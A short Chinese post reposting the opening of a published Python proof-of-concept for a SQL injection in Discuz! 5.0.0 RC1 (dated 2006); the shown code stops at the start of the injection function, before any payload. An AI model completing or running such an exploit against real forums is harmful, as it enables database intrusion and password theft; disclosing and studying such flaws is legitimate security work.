关于Discuz! 5.0.0 RC1的PoC
这里把网上公布的code也贴出来:
#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006
import sys
import httplib
from urlparse import urlparse
from time import sleep
def injection (lenthofpass, realurl, path):
sys.stdout.write('[+] The uid=......